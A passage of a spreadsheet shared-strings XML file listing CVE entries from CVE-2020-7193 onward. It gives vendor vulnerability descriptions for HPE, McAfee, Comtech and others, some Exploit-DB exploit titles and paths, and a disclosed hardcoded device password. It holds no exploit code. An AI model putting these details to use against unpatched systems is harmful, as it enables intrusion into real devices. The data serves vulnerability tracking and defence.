  <si>
    <t>CVE-2020-7193</t>
  </si>
  <si>
    <t>CVE-2020-7194</t>
  </si>
  <si>
    <t>A perfaddormoddevicemonitor expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7195</t>
  </si>
  <si>
    <t>A iccselectrules expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7196</t>
  </si>
  <si>
    <t>The HPE BlueData EPIC Software Platform version 4.0 and HPE Ezmeral Container Platform 5.0 use an insecure method of handling sensitive Kerberos passwords that is susceptible to unauthorized interception and/or retrieval. Specifically, they display the kdc_admin_password in the source file of the url "/bdswebui/assignusers/".</t>
  </si>
  <si>
    <t>CVE-2020-7197</t>
  </si>
  <si>
    <t>SSMC3.7.0.0 is vulnerable to remote authentication bypass. HPE StoreServ Management Console (SSMC) 3.7.0.0 is an off node multiarray manager web application and remains isolated from data on the managed arrays. HPE has provided an update to HPE StoreServ Management Console (SSMC) software 3.7.0.0* Upgrade to HPE 3PAR StoreServ Management Console 3.7.1.1 or later.</t>
  </si>
  <si>
    <t>CVE-2020-7198</t>
  </si>
  <si>
    <t>There is a remote escalation of privilege possible for a malicious user that has a OneView account in OneView and Synergy Composer. HPE has provided updates to Oneview and Synergy Composer: Update to version 5.5 of OneView, Composer, or Composer2.</t>
  </si>
  <si>
    <t>CVE-2020-7199</t>
  </si>
  <si>
    <t>A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.</t>
  </si>
  <si>
    <t>CVE-2020-7200</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified in HPE Systems Insight Manager (SIM) version 7.6. The vulnerability could be exploited to allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7201</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified in the HPE StoreEver MSL2024 Tape Library and HPE StoreEver 1/8 G2 Tape Autoloaders. The vulnerability could be remotely exploited to allow Cross-site Request Forgery (CSRF).</t>
  </si>
  <si>
    <t>CVE-2020-7202</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 4 (iLO 4) firmware. The vulnerability could be remotely exploited to disclose the serial number and other information.</t>
  </si>
  <si>
    <t>CVE-2020-7203</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified in HPE iLO Amplifier Pack server version 1.70. The vulnerability could be exploited to allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7205</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified in HPE Intelligent Provisioning, Service Pack for ProLiant, and HPE Scripting ToolKit. The vulnerability could be locally exploited to allow arbitrary code execution during the boot process. **Note:** This vulnerability is related to using insmod in GRUB2 in the specific impacted HPE product and HPE is addressing this issue. HPE has made the following software updates and mitigation information to resolve the vulnerability in Intelligent Provisioning, Service Pack for ProLiant, and HPE Scripting ToolKit. HPE provided latest Intelligent Provisioning, Service Pack for ProLiant, and HPE Scripting Toolkit which includes the GRUB2 patch to resolve this vulnerability. These new boot images will update GRUB2 and the Forbidden Signature Database (DBX). After the DBX is updated, users will not be able to boot to the older IP, SPP or Scripting ToolKit with Secure Boot enabled. HPE have provided a standalone DBX update tool to work with Microsoft Windows, and supported Linux Operating Systems. These tools can be used to update the Forbidden Signature Database (DBX) from within the OS. **Note:** This DBX update mitigates the GRUB2 issue with insmod enabled, and the "Boot Hole" issue for HPE signed GRUB2 applications.</t>
  </si>
  <si>
    <t>CVE-2020-7206</t>
  </si>
  <si>
    <t>HP nagios plugin for iLO (nagios-plugins-hpilo v1.50 and earlier) has a php code injection vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-7207</t>
  </si>
  <si>
    <t>A local elevation of privilege using physical access security vulnerability was found in HPE Proliant Gen10 Servers using Intel Innovation Engine (IE). This attack requires a physical attack to the server motherboard. To mitigate this issue, ensure your server is always physically secured. HPE will not address this issue in the impacted Gen 10 servers listed. HPE recommends using appropriate physical security methods as a compensating control to disallow an attacker from having physical access to the server main circuit board.</t>
  </si>
  <si>
    <t>CVE-2020-7208</t>
  </si>
  <si>
    <t>LinuxKI v6.0-1 and earlier is vulnerable to an XSS which is resolved in release 6.0-2.</t>
  </si>
  <si>
    <t>CVE-2020-7209</t>
  </si>
  <si>
    <t>LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/48483.txt</t>
  </si>
  <si>
    <t>HP LinuxKI 6.01 - Remote Command Injection</t>
  </si>
  <si>
    <t>CVE-2020-7210</t>
  </si>
  <si>
    <t>Umbraco CMS 8.2.2 allows CSRF to enable/disable or delete user accounts.</t>
  </si>
  <si>
    <t>CVE-2020-7211</t>
  </si>
  <si>
    <t>tftp.c in libslirp 4.1.0, as used in QEMU 4.2.0, does not prevent ..\ directory traversal on Windows.</t>
  </si>
  <si>
    <t>CVE-2020-7212</t>
  </si>
  <si>
    <t>The _encode_invalid_chars function in util/url.py in the urllib3 library 1.25.2 through 1.25.7 for Python allows a denial of service (CPU consumption) because of an inefficient algorithm. The percent_encodings array contains all matches of percent encodings. It is not deduplicated. For a URL of length N, the size of percent_encodings may be up to O(N). The next step (normalize existing percent-encoded bytes) also takes up to O(N) for each step, so the total time is O(N^2). If percent_encodings were deduplicated, the time to compute _encode_invalid_chars would be O(kN), where k is at most 484 ((10+6*2)^2).</t>
  </si>
  <si>
    <t>CVE-2020-7213</t>
  </si>
  <si>
    <t>Parallels 13 uses cleartext HTTP as part of the update process, allowing man-in-the-middle attacks. Users of out-of-date versions are presented with a pop-up window for a parallels_updates.xml file on the http://update.parallels.com web site.</t>
  </si>
  <si>
    <t>CVE-2020-7215</t>
  </si>
  <si>
    <t>An issue was discovered in Gallagher Command Centre 7.x before 7.90.991(MR5), 8.00 before 8.00.1161(MR5), and 8.10 before 8.10.1134(MR4). External system configuration data (used for third party integrations such as DVR systems) were logged in the Command Centre event trail. Any authenticated operator with the 'view events' privilege could see the full configuration, including cleartext usernames and passwords, under the event details of a Modified DVR System event.</t>
  </si>
  <si>
    <t>CVE-2020-7216</t>
  </si>
  <si>
    <t>An ni_dhcp4_parse_response memory leak in openSUSE wicked 0.6.55 and earlier allows network attackers to cause a denial of service by sending DHCP4 packets without a message type option.</t>
  </si>
  <si>
    <t>CVE-2020-7217</t>
  </si>
  <si>
    <t>An ni_dhcp4_fsm_process_dhcp4_packet memory leak in openSUSE wicked 0.6.55 and earlier allows network attackers to cause a denial of service by sending DHCP4 packets with a different client-id.</t>
  </si>
  <si>
    <t>CVE-2020-7218</t>
  </si>
  <si>
    <t>HashiCorp Nomad and Nonad Enterprise up to 0.10.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 0.10.3.</t>
  </si>
  <si>
    <t>CVE-2020-7219</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise up to 1.6.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 1.6.3.</t>
  </si>
  <si>
    <t>CVE-2020-7220</t>
  </si>
  <si>
    <t>HashiCorp Vault Enterprise 0.11.0 through 1.3.1 fails, in certain circumstances, to revoke dynamic secrets for a mount in a deleted namespace. Fixed in 1.3.2.</t>
  </si>
  <si>
    <t>CVE-2020-7221</t>
  </si>
  <si>
    <t>mysql_install_db in MariaDB 10.4.7 through 10.4.11 allows privilege escalation from the mysql user account to root because chown and chmod are performed unsafely, as demonstrated by a symlink attack on a chmod 04755 of auth_pam_tool_dir/auth_pam_tool. NOTE: this does not affect the Oracle MySQL product, which implements mysql_install_db differently.</t>
  </si>
  <si>
    <t>CVE-2020-7222</t>
  </si>
  <si>
    <t>An issue was discovered in Amcrest Web Server 2.520.AC00.18.R 2017-06-29 WEB 3.2.1.453504. The login page responds with JavaScript when one tries to authenticate. An attacker who changes the result parameter (to true) in this JavaScript code can bypass authentication and achieve limited privileges (ability to see every option but not modify them).</t>
  </si>
  <si>
    <t>CVE-2020-7224</t>
  </si>
  <si>
    <t>The Aviatrix OpenVPN client through 2.5.7 on Linux, macOS, and Windows is vulnerable when OpenSSL parameters are altered from the issued value set; the parameters could allow unauthorized third-party libraries to load.</t>
  </si>
  <si>
    <t>CVE-2020-7226</t>
  </si>
  <si>
    <t>CiphertextHeader.java in Cryptacular 1.2.3, as used in Apereo CAS and other products, allows attackers to trigger excessive memory allocation during a decode operation, because the nonce array length associated with "new byte" may depend on untrusted input within the header of encoded data.</t>
  </si>
  <si>
    <t>CVE-2020-7227</t>
  </si>
  <si>
    <t>Westermo MRD-315 1.7.3 and 1.7.4 devices have an information disclosure vulnerability that allows an authenticated remote attacker to retrieve the source code of different functions of the web application via requests that lack certain mandatory parameters. This affects ifaces-diag.asp, system.asp, backup.asp, sys-power.asp, ifaces-wls.asp, ifaces-wls-pkt.asp, and ifaces-wls-pkt-adv.asp.</t>
  </si>
  <si>
    <t>CVE-2020-7228</t>
  </si>
  <si>
    <t>The Calculated Fields Form plugin through 1.0.353 for WordPress suffers from multiple Stored XSS vulnerabilities present in the input forms. These can be exploited by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-7229</t>
  </si>
  <si>
    <t>An issue was discovered in Simplejobscript.com SJS before 1.65. There is unauthenticated SQL injection via the search engine. The parameter is landing_location. The function is countSearchedJobs(). The file is _lib/class.Job.php.</t>
  </si>
  <si>
    <t>CVE-2020-7231</t>
  </si>
  <si>
    <t>Evoko Home 1.31 devices provide different error messages for failed login requests depending on whether the username is valid.</t>
  </si>
  <si>
    <t>CVE-2020-7232</t>
  </si>
  <si>
    <t>Evoko Home devices 1.31 through 1.37 allow remote attackers to obtain sensitive information (such as usernames and password hashes) via a WebSocket request, as demonstrated by the sockjs/224/uf1psgff/websocket URI at a wss:// URL.</t>
  </si>
  <si>
    <t>CVE-2020-7233</t>
  </si>
  <si>
    <t>KMS Controls BAC-A1616BC BACnet devices have a cleartext password of snowman in the BACKDOOR_NAME variable in the BC_Logon.swf file.</t>
  </si>
  <si>
    <t>CVE-2020-7234</t>
  </si>
  <si>
    <t>Ruckus ZoneFlex R310 104.0.0.0.1347 devices allow Stored XSS via the SSID field on the Configuration &gt; Radio 2.4G &gt; Wireless X screen (after a successful login to the super account).</t>
  </si>
  <si>
    <t>CVE-2020-7235</t>
  </si>
  <si>
    <t>UHP UHP-100 3.4.1.15, 3.4.2.4, and 3.4.3 devices allow XSS via cB3?ta= (profile title).</t>
  </si>
  <si>
    <t>CVE-2020-7236</t>
  </si>
  <si>
    <t>UHP UHP-100 3.4.1.15, 3.4.2.4, and 3.4.3 devices allow XSS via cw2?td= (Site Name field of the Site Setup section).</t>
  </si>
  <si>
    <t>CVE-2020-7237</t>
  </si>
  <si>
    <t>Cacti 1.2.8 allows Remote Code Execution (by privileged users) via shell metacharacters in the Performance Boost Debug Log field of poller_automation.php. OS commands are executed when a new poller cycle begins. The attacker must be authenticated, and must have access to modify the Performance Settings of the product.</t>
  </si>
  <si>
    <t>CVE-2020-7238</t>
  </si>
  <si>
    <t>Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. This issue exists because of an incomplete fix for CVE-2019-16869.</t>
  </si>
  <si>
    <t>CVE-2020-7239</t>
  </si>
  <si>
    <t>The conversation-watson plugin before 0.8.21 for WordPress has a DOM-based XSS vulnerability that is executed when a chat message containing JavaScript is sent.</t>
  </si>
  <si>
    <t>CVE-2020-7240</t>
  </si>
  <si>
    <t>** DISPUTED ** Meinberg Lantime M300 and M1000 devices allow attackers (with privileges to configure a device) to execute arbitrary OS commands by editing the /config/netconf.cmd script (aka Extended Network Configuration). Note: According to the description, the vulnerability requires a fully authenticated super-user account using a webUI function that allows super users to edit a script supposed to execute OS commands. The given weakness enumeration (CWE-78) is not applicable in this case as it refers to abusing functions/input fields not supposed to be accepting OS commands by using 'Special Elements.'</t>
  </si>
  <si>
    <t>CVE-2020-7241</t>
  </si>
  <si>
    <t>The WP Database Backup plugin through 5.5 for WordPress stores downloads by default locally in the directory wp-content/uploads/db-backup/. This might allow attackers to read ZIP archives by guessing random ID numbers, guessing date strings with a 2020_{0..1}{0..2}_{0..3}{0..9} format, guessing UNIX timestamps, and making HTTPS requests with the complete guessed URL.</t>
  </si>
  <si>
    <t>CVE-2020-7242</t>
  </si>
  <si>
    <t>Comtech Stampede FX-1010 7.4.3 devices allow remote authenticated administrators to achieve remote code execution by navigating to the Diagnostics Trace Route page and entering shell metacharacters in the Target IP address field. (In some cases, authentication can be achieved with the comtech password for the comtech account.)</t>
  </si>
  <si>
    <t>CVE-2020-7243</t>
  </si>
  <si>
    <t>Comtech Stampede FX-1010 7.4.3 devices allow remote authenticated administrators to achieve remote code execution by navigating to the Fetch URL page and entering shell metacharacters in the URL field. (In some cases, authentication can be achieved with the comtech password for the comtech account.)</t>
  </si>
  <si>
    <t>CVE-2020-7244</t>
  </si>
  <si>
    <t>Comtech Stampede FX-1010 7.4.3 devices allow remote authenticated administrators to achieve remote code execution by navigating to the Poll Routes page and entering shell metacharacters in the Router IP Address field. (In some cases, authentication can be achieved with the comtech password for the comtech account.)</t>
  </si>
  <si>
    <t>CVE-2020-7245</t>
  </si>
  <si>
    <t>Incorrect username validation in the registration process of CTFd v2.0.0 - v2.2.2 allows an attacker to take over an arbitrary account if the username is known and emails are enabled on the CTFd instance. To exploit the vulnerability, one must register with a username identical to the victim's username, but with white space inserted before and/or after the username. This will register the account with the same username as the victim. After initiating a password reset for the new account, CTFd will reset the victim's account password due to the username collision.</t>
  </si>
  <si>
    <t>CVE-2020-7246</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50944.py</t>
  </si>
  <si>
    <t>qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)</t>
  </si>
  <si>
    <t>2022-05-25</t>
  </si>
  <si>
    <t>CVE-2020-7247</t>
  </si>
  <si>
    <t>smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.</t>
  </si>
  <si>
    <t>exploits/openbsd/remote/48051.pl</t>
  </si>
  <si>
    <t>OpenSMTPD 6.4.0 &lt; 6.6.1 - Local Privilege Escalation + Remote Code Execution</t>
  </si>
  <si>
    <t>2020-02-11</t>
  </si>
  <si>
    <t>CVE-2020-7248</t>
  </si>
  <si>
    <t>libubox in OpenWrt before 18.06.7 and 19.x before 19.07.1 has a tagged binary data JSON serialization vulnerability that may cause a stack based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-7249</t>
  </si>
  <si>
    <t>SMC D3G0804W 3.5.2.5-LAT_GA devices allow XSS via the SSID field on the WiFi Network Configuration page (after a successful login to the admin account).</t>
  </si>
  <si>
    <t>CVE-2020-7250</t>
  </si>
  <si>
    <t>Symbolic link manipulation vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 February 2020 Update allows authenticated local user to potentially gain an escalation of privileges by pointing the link to files which the user which not normally have permission to alter via carefully creating symbolic links from the ENS log file directory.</t>
  </si>
  <si>
    <t>CVE-2020-7251</t>
  </si>
  <si>
    <t>Improper access control vulnerability in Configuration Tool in McAfee Mcafee Endpoint Security (ENS) Prior to 10.6.1 February 2020 Update allows local users to disable security features via unauthorised use of the configuration tool from older versions of ENS.</t>
  </si>
  <si>
    <t>CVE-2020-7252</t>
  </si>
  <si>
    <t>Unquoted service executable path in DXL Broker in McAfee Data eXchange Layer (DXL) Framework 6.0.0 and earlier allows local users to cause a denial of service and malicious file execution via carefully crafted and named executable files.</t>
  </si>
  <si>
    <t>CVE-2020-7253</t>
  </si>
  <si>
    <t>Improper access control vulnerability in masvc.exe in McAfee Agent (MA) prior to 5.6.4 allows local users with administrator privileges to disable self-protection via a McAfee supplied command-line utility.</t>
  </si>
  <si>
    <t>CVE-2020-7254</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in the command line interface in McAfee Advanced Threat Defense (ATD) 4.x prior to 4.8.2 allows local users to execute arbitrary code via improper access controls on the sudo command.</t>
  </si>
  <si>
    <t>CVE-2020-7255</t>
  </si>
  <si>
    <t>Privilege escalation vulnerability in the administrative user interface in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 February 2020 Update allows local users to gain elevated privileges via ENS not checking user permissions when editing configuration in the ENS client interface. Administrators can lock the ENS client interface through ePO to prevent users being able to edit the configuration.</t>
  </si>
  <si>
    <t>CVE-2020-7256</t>
  </si>
  <si>
    <t>Cross site scripting vulnerability in McAfee Network Security Management (NSM) Prior to 9.1 update 6 Mar 2020 Update allows attackers to unspecified impact via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-7257</t>
  </si>
  <si>
    <t>Privilege escalation vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 February 2020 Update allows local users to cause the deletion and creation of files they would not normally have permission to through altering the target of symbolic links whilst an anti-virus scan was in progress. This is timing dependent.</t>
  </si>
  <si>
    <t>CVE-2020-7258</t>
  </si>
  <si>
    <t>CVE-2020-7259</t>
  </si>
  <si>
    <t>Exploitation of Privilege/Trust vulnerability in file in McAfee Endpoint Security (ENS) Prior to 10.7.0 February 2020 Update allows local users to bypass local security protection via a carefully crafted input file</t>
  </si>
  <si>
    <t>CVE-2020-7260</t>
  </si>
  <si>
    <t>DLL Side Loading vulnerability in the installer for McAfee Application and Change Control (MACC) prior to 8.3 allows local users to execute arbitrary code via execution from a compromised folder.</t>
  </si>
  <si>
    <t>CVE-2020-7261</t>
  </si>
  <si>
    <t>Buffer Overflow via Environment Variables vulnerability in AMSI component in McAfee Endpoint Security (ENS) Prior to 10.7.0 February 2020 Update allows local users to disable Endpoint Security via a carefully crafted user input.</t>
  </si>
  <si>
    <t>CVE-2020-7262</t>
  </si>
  <si>
    <t>Improper Access Control vulnerability in McAfee Advanced Threat Defense (ATD) prior to 4.10.0 allows local users to view sensitive files via a carefully crafted HTTP request parameter.</t>
  </si>
  <si>
    <t>CVE-2020-7263</t>
  </si>
  <si>
    <t>Improper access control vulnerability in ESconfigTool.exe in McAfee Endpoint Security (ENS) for Windows all current versions allows local administrator to alter ENS configuration up to and including disabling all protection offered by ENS via insecurely implemented encryption of configuration for export and import.</t>
  </si>
  <si>
    <t>CVE-2020-7264</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 Hotfix 199847 allows local users to delete files the user would otherwise not have access to via manipulating symbolic links to redirect a McAfee delete action to an unintended file. This is achieved through running a malicious script or program on the target machine.</t>
  </si>
  <si>
    <t>CVE-2020-7265</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Endpoint Security (ENS) for Mac prior to 10.6.9 allows local users to delete files the user would otherwise not have access to via manipulating symbolic links to redirect a McAfee delete action to an unintended file. This is achieved through running a malicious script or program on the target machine.</t>
  </si>
  <si>
    <t>CVE-2020-7266</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee VirusScan Enterprise (VSE) for Windows prior to 8.8 Patch 14 Hotfix 116778 allows local users to delete files the user would otherwise not have access to via manipulating symbolic links to redirect a McAfee delete action to an unintended file. This is achieved through running a malicious script or program on the target machine.</t>
  </si>
  <si>
    <t>CVE-2020-7267</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee VirusScan Enterprise (VSE) for Linux prior to 2.0.3 Hotfix 2635000 allows local users to delete files the user would otherwise not have access to via manipulating symbolic links to redirect a McAfee delete action to an unintended file. This is achieved through running a malicious script or program on the target machine.</t>
  </si>
  <si>
    <t>CVE-2020-7268</t>
  </si>
  <si>
    <t>Path Traversal vulnerability in McAfee McAfee Email Gateway (MEG) prior to 7.6.406 allows remote attackers to traverse the file system to access files or directories that are outside of the restricted directory via external input to construct a path name that should be within a restricted directory.</t>
  </si>
  <si>
    <t>CVE-2020-7269</t>
  </si>
  <si>
    <t>Exposure of Sensitive Information in the web interface in McAfee Advanced Threat Defense (ATD) prior to 4.12.2 allows remote authenticated users to view sensitive unencrypted information via a carefully crafted HTTP request parameter. The risk is partially mitigated if your ATD instances are deployed as recommended with no direct access from the Internet to them.</t>
  </si>
  <si>
    <t>CVE-2020-7270</t>
  </si>
  <si>
    <t>CVE-2020-7273</t>
  </si>
  <si>
    <t>Accessing functionality not properly constrained by ACLs vulnerability in the autorun start-up protection in McAfee Endpoint Security (ENS) for Windows Prior to 10.7.0 April 2020 Update allows local users to delete or rename programs in the autorun key via manipulation of some parameters.</t>
  </si>
  <si>
    <t>CVE-2020-7274</t>
  </si>
  <si>
    <t>Privilege escalation vulnerability in McTray.exe in McAfee Endpoint Security (ENS) for Windows Prior to 10.7.0 April 2020 Update allows local users to spawn unrelated processes with elevated privileges via the system administrator granting McTray.exe elevated privileges (by default it runs with the current user's privileges).</t>
  </si>
  <si>
    <t>CVE-2020-7275</t>
  </si>
  <si>
    <t>Accessing, modifying or executing executable files vulnerability in the uninstaller in McAfee Endpoint Security (ENS) for Windows Prior to 10.7.0 April 2020 Update allows local users to execute arbitrary code via a carefully crafted input file.</t>
  </si>
  <si>
    <t>CVE-2020-7276</t>
  </si>
  <si>
    <t>Authentication bypass vulnerability in MfeUpgradeTool in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 April 2020 Update allows administrator users to access policy settings via running this tool.</t>
  </si>
  <si>
    <t>CVE-2020-7277</t>
  </si>
  <si>
    <t>Protection mechanism failure in all processes in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 April 2020 Update allows local users to stop certain McAfee ENS processes, reducing the protection offered.</t>
  </si>
  <si>
    <t>CVE-2020-7278</t>
  </si>
  <si>
    <t>Exploiting incorrectly configured access control security levels vulnerability in ENS Firewall in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 April 2020 and 10.6.1 April 2020 updates allows remote attackers and local users to allow or block unauthorized traffic via pre-existing rules not being handled correctly when updating to the February 2020 updates.</t>
  </si>
  <si>
    <t>CVE-2020-7279</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking Vulnerability in the installer component of McAfee Host Intrusion Prevention System (Host IPS) for Windows prior to 8.0.0 Patch 15 Update allows attackers with local access to execute arbitrary code via execution from a compromised folder.</t>
  </si>
  <si>
    <t>CVE-2020-7280</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability during daily DAT updates when using McAfee Virus Scan Enterprise (VSE) prior to 8.8 Patch 15 allows local users to cause the deletion and creation of files they would not normally have permission to through altering the target of symbolic links. This is timing dependent.</t>
  </si>
  <si>
    <t>CVE-2020-7281</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Total Protection (MTP) prior to 16.0.R26 allows local users to delete files the user would otherwise not have access to via manipulating symbolic links to redirect a McAfee delete action to an unintended file. This is achieved through running a malicious script or program on the target machine.</t>
  </si>
  <si>
    <t>CVE-2020-7282</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Total Protection (MTP) before 16.0.R26 allows local users to delete files the user would otherwise not have access to via manipulating symbolic links to redirect a McAfee delete action to an unintended file. This is achieved through running a malicious script or program on the target machine.</t>
  </si>
  <si>
    <t>CVE-2020-7283</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Total Protection (MTP) before 16.0.R26 allows local users to create and edit files via symbolic link manipulation in a location they would otherwise not have access to. This is achieved through running a malicious script or program on the target machine.</t>
  </si>
  <si>
    <t>CVE-2020-7284</t>
  </si>
  <si>
    <t>Exposure of Sensitive Information in McAfee Network Security Management (NSM) prior to 10.1.7.7 allows local users to gain unauthorised access to the root account via execution of carefully crafted commands from the restricted command line interface (CLI).</t>
  </si>
  <si>
    <t>CVE-2020-7285</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee MVISION Endpoint prior to 20.5.0.94 allows a malicious script or program to perform functions that the local executing user has not been granted access to.</t>
  </si>
  <si>
    <t>CVE-2020-7286</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Windows prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to.</t>
  </si>
  <si>
    <t>CVE-2020-7287</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Linux prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to.</t>
  </si>
  <si>
    <t>CVE-2020-7288</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Mac prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to.</t>
  </si>
  <si>
    <t>CVE-2020-7289</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Active Response (MAR) for Windows prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to.</t>
  </si>
  <si>
    <t>CVE-2020-7290</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Active Response (MAR) for Linux prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to.</t>
  </si>
  <si>
    <t>CVE-2020-7291</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Active Response (MAR) for Mac prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to.</t>
  </si>
  <si>
    <t>CVE-2020-7292</t>
  </si>
  <si>
    <t>Inappropriate Encoding for output context vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows a remote attacker to cause MWG to return an ambiguous redirect response via getting a user to click on a malicious URL.</t>
  </si>
  <si>
    <t>CVE-2020-7293</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user with low permissions to change the system's root password via improper access controls in the user interface.</t>
  </si>
  <si>
    <t>CVE-2020-7294</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to delete or download protected files via improper access controls in the REST interface.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-7295</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to delete or download protected log data via improper access controls in the user interface.</t>
  </si>
  <si>
    <t>CVE-2020-7296</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to access protected configuration files via improper access control in the user interface.</t>
  </si>
  <si>
    <t>CVE-2020-7297</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to access protected dashboard data via improper access control in the user interface.</t>
  </si>
  <si>
    <t>CVE-2020-7298</t>
  </si>
  <si>
    <t>Unexpected behavior violation in McAfee Total Protection (MTP) prior to 16.0.R26 allows local users to turn off real time scanning via a specially crafted object making a specific function call.</t>
  </si>
  <si>
    <t>CVE-2020-7299</t>
  </si>
  <si>
    <t>Cleartext Storage of Sensitive Information in Memory vulnerability in Microsoft Windows client in McAfee True Key (TK) prior to 6.2.109.2 allows a local user logged in with administrative privileges to access to another user’s passwords on the same machine via triggering a process dump in specific situations.</t>
  </si>
  <si>
    <t>CVE-2020-7300</t>
  </si>
  <si>
    <t>Improper Authorization vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated remote attackers to change the configuration when logged in with view only privileges via carefully constructed HTTP post messages.</t>
  </si>
  <si>
    <t>CVE-2020-7301</t>
  </si>
  <si>
    <t>Cross Site scripting vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated attackers to trigger alerts via the file upload tab in the DLP case management section.</t>
  </si>
  <si>
    <t>CVE-2020-7302</t>
  </si>
  <si>
    <t>Unrestricted Upload of File with Dangerous Type in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated attackers to upload malicious files to the DLP case management section via lack of sanity checking.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-7303</t>
  </si>
  <si>
    <t>Cross Site scripting vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated remote user to trigger scripts to run in a user's browser via adding a new label.</t>
  </si>
  <si>
    <t>CVE-2020-7304</t>
  </si>
  <si>
    <t>Cross site request forgery vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated remote attacker to embed a CRSF script via adding a new label.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L</t>
  </si>
  <si>
